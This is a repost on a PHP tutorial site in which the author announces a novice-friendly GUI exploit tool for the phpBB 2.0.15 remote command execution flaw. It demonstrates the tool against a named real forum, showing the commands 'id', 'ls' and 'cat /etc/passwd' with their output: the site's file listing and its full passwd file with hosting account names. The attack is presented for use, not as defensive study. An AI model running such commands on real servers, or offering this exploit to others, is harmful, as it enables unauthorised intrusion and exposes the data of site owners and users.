Community
Learn
Tools Library
AI Tools
Leisure
search
English
Home > Backend Development > PHP Tutorial > PHPbb2.0.15 Remote Command Execution Vulnerability Exploit Program_PHP Tutorial

PHPbb2.0.15 Remote Command Execution Vulnerability Exploit Program_PHP Tutorial

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Release: 2016-07-13 17:20:06
Original
2399 people have browsed it

The annoying primary school semester is finally over. I saw Brother Invincible's "Notes on Rewriting the PHPbb2.0.15 Remote Command Execution Vulnerability Test". Now that I have some free time, I also wrote a GUI for exploiting this vulnerability. version, suitable for novices. The program basically implements the functions of the python program http://www.securiteam.com/exploits/5QP0X00G0C.html. Note: When the amount of data read is too large, the program will temporarily suspended animation.
Test:
Forum Url: http://www.tuoitho.net/diendan/
Topic ID: 15218 Command: id
Data Received: uid=99(nobody) gid=99(nobody) groups =99(nobody)

Of course we can use other commands such as typing ls to return:

_makepagelink.php
_new_register.txt
_news.txt
admin
bank_index.php
cache
chat_popup.js
common.php
config.php
db
ecards
extension.inc
faq.php
flashgame
forum.php
gallery
groupcp.php
images
includes
index.php
language
login.php
memberlist.php
modcp .php
photo
posting.php
privmsg.php
profile.php
realmusic.php
search.php
streammedia.php
templates
tt_images
tt_temp
ttd_news.php
vietuni8.js
viewforum.php
viewonline.php
viewtopic.php
ysi.htm
ysi.php

Enter cat /etc/passwd and return:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/ sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp: x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0: shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/ sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator: x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher: /var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/ nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ident:x:100:101::/home/ident:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32 :Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/ X11/fs:/sbin/nologin
wnn:x:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin
named:x:25:25:Named:/var/ named:/sbin/nologin
mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash
mailnull:x:47:47:Exim:/var/spool/mqueue :/bin/false
cpanel:x:32001:502::/usr/local/cpanel:/bin/bash
mailman:x:32002:503::/usr/local/cpanel/3rdparty/mailman :/bin/bash
ltsv-1990:x:32003:32003::/home/ltsv-1990:/bin/bash
ttnet:x:32004:504::/home/ttnet:/bin/ bash
ttmail:x:32005:505::/home/ttmail:/usr/local/cpanel/bin/noshell
doicongl:x:32006:506::/home/doicongl:/usr/local/ cpanel/bin/noshell
realmsof:x:32007:507::/home/realmsof:/usr/local/cpanel/bin/noshell
trpanoco:x:32009:509::/home/trpanoco:/ usr/local/cpanel/bin/noshell
qua:x:32008:508::/home/qua:/usr/local/cpanel/bin/noshell
key:x:32010:510::/home /key:/usr/local/cpanel/bin/noshell
cuop:x:32011:511::/home/cuop:/usr/local/cpanel/bin/noshell
bluewebp:x:32012:512 ::/home/bluewebp:/usr/local/cpanel/bin/noshell
shugoten:x:32013:513::/home/shugoten:/usr/local/cpanel/bin/noshell
afghansa:x :32014:514::/home/afghansa:/usr/local/cpanel/bin/noshell
polishtr:x:32015:515::/home/polishtr:/usr/local/cpanel/bin/noshell
gioitrec:x:32016:516::/home/gioitrec:/usr/local/cpanel/bin/noshell
colorado:x:32017:517::/home/colorado:/usr/local/cpanel/bin /noshell
wannabel:x:32018:518::/home/wannabel:/usr/local/cpanel/bin/noshell
cactuslo:x:32019:519::/home/cactuslo:/usr/local /cpanel/bin/noshell
aznphoto:x:32020:520::/home/aznphoto:/bin/bash
journeyo:x:32021:521::/home/journeyo:/usr/local/cpanel /bin/noshell
chiropra:x:32022:522::/home/chiropra:/usr/local/cpanel/bin/noshellPHPbb2.0.15 Remote Command Execution Vulnerability Exploit Program_PHP Tutorial

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/532621.htmlTechArticleThe annoying primary school semester is finally over, and I saw the rewriting notes of Invincible Brother’s PHPbb2.0.15 remote command execution vulnerability test , now that I have some free time, I also wrote a GUI version of the exploit program for this vulnerability, which is suitable for...
Related labels:
superior use Order Small implement Invincible loopholes of program Remotely
Previous article:PHP/MySQL Three-Day Pass - Day Two (Thursday)_PHP Tutorial Next article:PHP/MySQL Three-Day Pass-Day Three (1)_PHP Tutorial
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
Team collaboration - What should I do if someone needs the feature I wrote as a dependency in git flow?
From 1970-01-01 08:00:00
0
0
0
Objective-c - Constraints for iOS a warning issue
From 1970-01-01 08:00:00
0
0
0
Confusion about using gitlab's fork&pull request mode within the team
From 1970-01-01 08:00:00
0
0
0
Objective-c - In iOS development, Instagram cannot be authorized after logging in. Instagram does not jump back to the application. How to get the callback address?
From 1970-01-01 08:00:00
0
0
0
Version Control - About the use of SVN and GIT in company projects?
From 1970-01-01 08:00:00
0
0
0
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template